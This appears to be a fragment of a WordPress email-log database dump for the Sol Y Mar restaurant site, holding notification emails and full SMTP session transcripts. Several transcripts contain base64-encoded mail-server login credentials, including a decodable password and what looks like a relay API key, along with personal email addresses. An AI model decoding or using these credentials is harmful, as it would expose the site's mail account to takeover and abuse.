0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi lupswrgooxz,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>lupswrgooxz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37620,3694,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37621,3694,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 01 Jan 2021 06:45:44 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37622,3695,'solution','Not found, check status column for more info.'),(37623,3695,'success','1'),(37624,3695,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37625,3695,'to_header','lupswrgooxz@demo.com'),(37626,3695,'reply_to_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(37627,3695,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37628,3695,'original_to','lupswrgooxz@demo.com'),(37629,3695,'original_subject','Your Sol Y Mar account has been created!'),(37630,3695,'original_message','<!DOCTYPE html>\n<html lang=\"en-US\">\n	<head>\n		<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n		<title>Sol Y Mar</title>\n	</head>\n	<body leftmargin=\"0\" marginwidth=\"0\" topmargin=\"0\" marginheight=\"0\" offset=\"0\" style=\"padding: 0;\">\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-adjust: none;\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" height=\"100%\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0, 0, 0.1); border-radius: 3px;\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1; color: #ffffff; border-bottom: 0; font-weight: bold; line-height: 100%; vertical-align: middle; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radius: 3px 3px 0 0;\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px; display: block;\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-align: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color: inherit;\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd;\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px;\">\n															<div id=\"body_content_inner\" style=\'color: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>\n\n<p style=\"margin: 0 0 16px;\">Hi lupswrgooxz,</p>\n<p style=\"margin: 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username is <strong>lupswrgooxz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px;\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0; border-radius: 6px;\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px; border: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>\n												<p style=\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	</body>\n</html>\n'),(37631,3695,'original_headers','Content-Type: text/html\r\nReply-to: Sol Y Mar, ristorante a Riccione <notifiche@ristorantesolymar.it>\r\n'),(37632,3695,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Fri, 01 Jan 2021 06:45:46 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<lupswrgooxz@demo.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/html; charset=UTF-8\r\nFrom: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: lupswrgooxz@demo.com\r\nReply-To: \"Sol Y Mar, ristorante a Riccione\" <notifiche@ristorantesolymar.it>\r\nMessage-Id: <e25b154b09fae66218a69be472ad90d7@ristorantesolymar.it>\r\nSubject: Your Sol Y Mar account has been created!\r\nDate: Fri, 01 Jan 2021 11:45:46 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\n<!DOCTYPE html>=0A<html lang=3D\"en-US\">=0A=09<head>=0A=09=09<meta http-e=\r\nquiv=3D\"Content-Type\" content=3D\"text/html; charset=3DUTF-8\">=0A=09=09<t=\r\nitle>Sol Y Mar</title>=0A=09</head>=0A=09<body leftmargin=3D\"0\" marginwi=\r\ndth=3D\"0\" topmargin=3D\"0\" marginheight=3D\"0\" offset=3D\"0\" style=3D\"paddi=\r\nng: 0;\">=0A=09=09<div id=3D\"wrapper\" dir=3D\"ltr\" style=3D\"background-col=\r\nor: #f5f5f5; margin: 0; padding: 70px 0; width: 100%; -webkit-text-size-=\r\nadjust: none;\">=0A=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspa=\r\ncing=3D\"0\" height=3D\"100%\" width=3D\"100%\">=0A=09=09=09=09<tr>=0A=09=09=\r\n=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<div i=\r\nd=3D\"template_header_image\">=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</=\r\ndiv>=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"0\" cellspaci=\r\nng=3D\"0\" width=3D\"600\" id=3D\"template_container\" style=3D\"background-col=\r\nor: #fdfdfd; border: 1px solid #dcdcdc; box-shadow: 0 1px 4px rgba(0, 0,=\r\n 0, 0.1); border-radius: 3px;\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09=\r\n=09=09=09<!-- Header -->=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0=\r\n\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"100%\" id=3D\"template_head=\r\ner\" style=3D\'background-color: #557da1; color: #ffffff; border-bottom: 0=\r\n; font-weight: bold; line-height: 100%; vertical-align: middle; font-fam=\r\nily: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; border-radi=\r\nus: 3px 3px 0 0;\'>=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09<td id=3D\"header_wrapper\" style=3D\"padding: 36px 48=\r\npx; display: block;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<h1 style=3D=\r\n\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; fo=\r\nnt-size: 30px; font-weight: 300; line-height: 150%; margin: 0; text-alig=\r\nn: left; text-shadow: 0 1px 0 #7797b4; color: #ffffff; background-color:=\r\n inherit;\'>Welcome to Sol Y Mar</h1>=0A=09=09=09=09=09=09=09=09=09=09=09=\r\n</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=\r\n=09</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Header -->=0A=09=09=09=\r\n=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=\r\n=0A=09=09=09=09=09=09=09=09=09<!-- Body -->=0A=09=09=09=09=09=09=09=09=\r\n=09<table border=3D\"0\" cellpadding=3D\"0\" cellspacing=3D\"0\" width=3D\"600\"=\r\n id=3D\"template_body\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09=09=09=09<td valign=3D\"top\" id=3D\"body_content\" style=3D\"=\r\nbackground-color: #fdfdfd;\">=0A=09=09=09=09=09=09=09=09=09=09=09=09<!--=\r\n Content -->=0A=09=09=09=09=09=09=09=09=09=09=09=09<table border=3D\"0\" c=\r\nellpadding=3D\"20\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09<t=\r\nd valign=3D\"top\" style=3D\"padding: 48px 48px 32px;\">=0A=09=09=09=09=09=\r\n=09=09=09=09=09=09=09=09=09=09<div id=3D\"body_content_inner\" style=3D\'co=\r\nlor: #737373; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, s=\r\nans-serif; font-size: 14px; line-height: 150%; text-align: left;\'>=0A=0A=\r\n<p style=3D\"margin: 0 0 16px;\">Hi lupswrgooxz,</p>=0A<p style=3D\"margin:=\r\n 0 0 16px;\">Thanks for creating an account on Sol Y Mar. Your username i=\r\ns <strong>lupswrgooxz</strong>. You can access your account area to view=\r\n orders, change your password, and more at: <a href=3D\"https://www.risto=\r\nrantesolymar.it/mio-account/\" rel=3D\"nofollow\" style=3D\"color: #557da1;=\r\n font-weight: normal; text-decoration: underline;\">https://www.ristorant=\r\nesolymar.it/mio-account/</a></p>=0A=0A<p style=3D\"margin: 0 0 16px;\">We=\r\n look forward to seeing you soon.</p>=0A=09=09=09=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09=09</td>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09=09=09=09=09<!-- End C=\r\nontent -->=0A=09=09=09=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=\r\n=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=\r\n=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=09=09=09=09<td align=3D=\r\n\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-- Footer -->=0A=09=09=09=\r\n=09=09=09<table border=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=\r\n=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=09=09=09<tr>=0A=09=09=09=\r\n=09=09=09=09=09<td valign=3D\"top\" style=3D\"padding: 0; border-radius: 6p=\r\nx;\">=0A=09=09=09=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=09=09=09=09=09=09=09<tr>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=3D\"2\" valign=3D\"middle\"=\r\n id=3D\"credit\" style=3D\'border-radius: 6px; border: 0; color: #969696; f=\r\nont-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif; font=\r\n-size: 12px; line-height: 150%; text-align: center; padding: 24px 0;\'>=\r\n=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D\"margin: 0 0 16px;\">So=\r\nl Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=09=09=09=09=09=09=09</=\r\ntd>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09<=\r\n/table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=\r\n=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09<!-- End Footer -->=0A=09=\r\n=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09</table>=0A=09=09</div>=\r\n=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1kvIsM-00044N-Lv\r\n'),(37634,3696,'success',''),(37635,3696,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37636,3696,'to_header','webmaster@baldisserri.com'),(37637,3696,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37638,3696,'original_to','webmaster@baldisserri.com'),(37639,3696,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37640,3696,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.43 to 1.16.45)\n- WP Fastest Cache (from version 0.9.1.3 to 0.9.1.4)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37641,3696,'original_headers',''),(37642,3696,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 04 Jan 2021 19:29:07 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37643,3697,'solution','Not found, check status column for more info.'),(37644,3697,'success','1'),(37645,3697,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37646,3697,'to_header','webmaster@baldisserri.com'),(37647,3697,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37648,3697,'original_to','webmaster@baldisserri.com'),(37649,3697,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37650,3697,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.43 to 1.16.45)\n- WP Fastest Cache (from version 0.9.1.3 to 0.9.1.4)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37651,3697,'original_headers',''),(37652,3697,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Mon, 04 Jan 2021 19:29:09 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <e00ef2bd7b37f88baaaeac76e964ae2a@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Tue, 05 Jan 2021 00:29:09 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Updr=\r\naftPlus - Backup/Restore (from version 1.16.43 to 1.16.45)=0A- WP Fastes=\r\nt Cache (from version 0.9.1.3 to 0.9.1.4)=0A=0A=0AIf you experience any=\r\n issues or need support, the volunteers in the WordPress.org support for=\r\nums may be able to help.=0Ahttps://wordpress.org/support/forums/=0A=0ATh=\r\ne WordPress Team\r\n.\r\n250 OK id=1kwaDl-0003Qs-TE\r\n'),(37660,3698,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.45 to 1.16.46)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37661,3698,'original_headers',''),(37662,3698,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 05 Jan 2021 19:22:59 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37663,3699,'solution','Not found, check status column for more info.'),(37664,3699,'success','1'),(37665,3699,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37666,3699,'to_header','webmaster@baldisserri.com'),(37667,3699,'transport_uri','smtps:login://mail.ristorantesolymar.it:465'),(37668,3699,'original_to','webmaster@baldisserri.com'),(37669,3699,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37670,3699,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.45 to 1.16.46)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37671,3699,'original_headers',''),(37672,3699,'session_transcript','smtps:login://mail.ristorantesolymar.it:465\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Tue, 05 Jan 2021 19:23:01 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [173.214.189.150]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH LOGIN\r\n334 VXNlcm5hbWU6\r\nbm90aWZpY2hlQHJpc3RvcmFudGVzb2x5bWFyLml0\r\n334 UGFzc3dvcmQ6\r\nU29seW1hcjIwMjA=\r\n235 Authentication succeeded\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 OK\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 Accepted\r\nDATA\r\n354 Enter message, ending with \".\" on a line by itself\r\nX-Mailer: Postman SMTP 2.0.16 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <0c4287fa166bbfc82b17999f1ed5f74e@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Some plugins were automatically updated\r\nDate: Wed, 06 Jan 2021 00:23:01 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nHowdy! Some plugins have automatically updated to their latest versions=\r\n on your site at https://www.ristorantesolymar.it. No further action is=\r\n needed on your part.=0A=0A=0AThese plugins are now up to date:=0A- Updr=\r\naftPlus - Backup/Restore (from version 1.16.45 to 1.16.46)=0A=0A=0AIf yo=\r\nu experience any issues or need support, the volunteers in the WordPress=\r\n..org support forums may be able to help.=0Ahttps://wordpress.org/support=\r\n/forums/=0A=0AThe WordPress Team\r\n.\r\n250 OK id=1kwwbN-0003d1-Dv\r\n'),(37726,3705,'solution','<a target=\"_blank\" href=\"https://postmansmtp.com/incorrect-authentication-data/\">Read here</a>'),(37727,3705,'success',''),(37728,3705,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(37729,3705,'to_header','webmaster@baldisserri.com'),(37730,3705,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(37731,3705,'original_to','webmaster@baldisserri.com'),(37732,3705,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(37733,3705,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Mail SMTP Plugin by Mail Bank (from version 4.0.12 to 4.0.13)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(37734,3705,'original_headers',''),(37735,3705,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220-OK1071.kvchosting.com ESMTP Exim 4.93 #2 Sat, 09 Jan 2021 07:24:03 -0500 \r\n220-We do not authorize the use of this system to transport unsolicited, \r\n220 and/or bulk e-mail.\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250-STARTTLS\r\n250 HELP\r\nSTARTTLS\r\n220 TLS go ahead\r\nEHLO ristorantesolymar.it\r\n250-OK1071.kvchosting.com Hello ristorantesolymar.it [198.102.8.41]\r\n250-SIZE 52428800\r\n250-8BITMIME\r\n250-PIPELINING\r\n250-AUTH PLAIN LOGIN\r\n250 HELP\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n535 Incorrect authentication data\r\n'),(37736,3706,'solution','Not found, check status column for more info.'),(37737,3706,'success','1'),(37738,3706,'from_header','Sol Y Mar 